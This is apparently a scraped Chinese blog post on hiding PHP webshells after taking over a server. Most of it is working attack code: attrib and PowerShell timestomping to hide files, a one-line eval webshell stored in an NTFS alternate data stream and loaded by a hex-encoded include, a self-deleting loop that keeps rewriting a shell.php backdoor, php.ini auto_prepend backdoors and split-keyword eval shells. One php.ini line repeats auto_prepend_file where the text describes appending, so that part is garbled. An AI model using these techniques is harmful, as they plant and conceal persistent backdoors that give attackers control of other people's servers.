mdb文件取消隐藏_webshellphp隐藏技巧
在紅藍對抗中,我們在拿下一個服務器之后該如何讓權限維持的久一些而不被管理員輕易的發現 ,除了Webshell要免殺,還需要注意一些隱藏技巧,因此就要在我們上傳的木馬動點手腳想辦法不被管理員以及檢測工具快速的發現。
0x01 Attrib隱藏文件
使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。
參數說明:
+r?設置只讀屬性-r?取消只讀屬性
+a?設置存檔屬性
-a?取消存檔屬性
+s?設置系統屬性
-s?取消系統屬性
+h?設置隱藏屬性
-h?取消隱藏屬性
/s?顯示目錄下所有文件的屬性
/d?將attrib和任意命令行選項應用到目錄
執行完命令后當前目錄下的文件即隱藏,即使開啟了顯示隱藏的文件或是dir都是看不見的
attrib?+s?+a?+h?+r?shell.php???//隱藏shell.php文件0x02 修改文件時間屬性
當你試圖在一堆文件中隱藏自己新創建的文件,那么,除了創建一個迷惑性的文件名,還需要修改文件的修改日期。
Set-ItemProperty?-Path?2.txt?LastWriteTime?-Value?"2020-11-01?12:12:12"??//修改時間修改Set-ItemProperty?-Path?2.txt?LastAccessTime?-Value?"2020-11-01?12:12:12"??//訪問時間修改
Set-ItemProperty?-Path?2.txt?CreationTime?-Value?"2020-11-01?12:12:12"??//創建時間修改
使用命令獲取文件屬性:
Get-ItemProperty?-Path?D:\1.dll?|?Format-list?-Property?*?-Force修改某個文件夾下所有文件的創建和修改時間:
powershell.exe?-command?"ls?'test\*.*'?|?foreach-object?{?$_.LastWriteTime?=??Get-Date?;?$_.CreationTime?=?'2077/01/01?19:00:00'?}"0x03 利用ADS隱藏文件內容
通過在命令行中echo一個數據流從而創建一個ADS隱藏文件
echo?^<?php ?@eval($_POST['chopper']);?^>?>?mm.php:shell.jpg我們只能看見一個index.php文件,且內容為空,常規的文件管理器、type命令,dir命令、del命令發現都找不出那個shell.jpg的。通過命令行輸入完整的文件名即可通過notepad進行編輯,可以看到我們echo進去的一句話木馬。
雖然我們已經將文件隱藏了,但是木馬并不能夠起作用,這里就需要用到文件包含,利用include函數,mm.php:shell.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。
<?php ?@include(PACK('H*','6D6D2E7068703A7368656C6C2E6A7067'));?>0x04 不死馬
<?php
set_time_limit(0);??
ignore_user_abort(1);?
unlink(__FILE__);?????//刪除自身while(1)
{????
????file_put_contents('shell.php','<?php ?@eval($_GET[cmd]);?>');??//創建shell.php,這里最好用免殺的一句話
????sleep(10);????//間隔時間
}?>
在每次刪除后的10秒鐘之后又會重新生成一個新的shell.php文件,若要徹底刪除文件最好的方法是將web服務停止了再刪除。
0x05 php.ini
php.ini 中可以指定在主文件執行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。
;在PHP文檔之前自動添加文件。auto_prepend_file?=?"c:\tmp.txt"
;在PHP文檔之后自動添加文件。
auto_prepend_file?=?"c:\tmp.txt"
訪問任意一個php文件即可獲取webshell。
0x06 關鍵字拆分與文件包含
1.php內容:
<?php$a=$_POST['x'];?>
2.php內容:
<?php include?"1.php";@eval($a);?>
直接訪問2.php即可獲取webshell
總結
以上是生活随笔為你收集整理的mdb文件取消隐藏_webshellphp隐藏技巧的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python识图找图_利用python进
- 下一篇: Google 联合 Plaxo 对 Op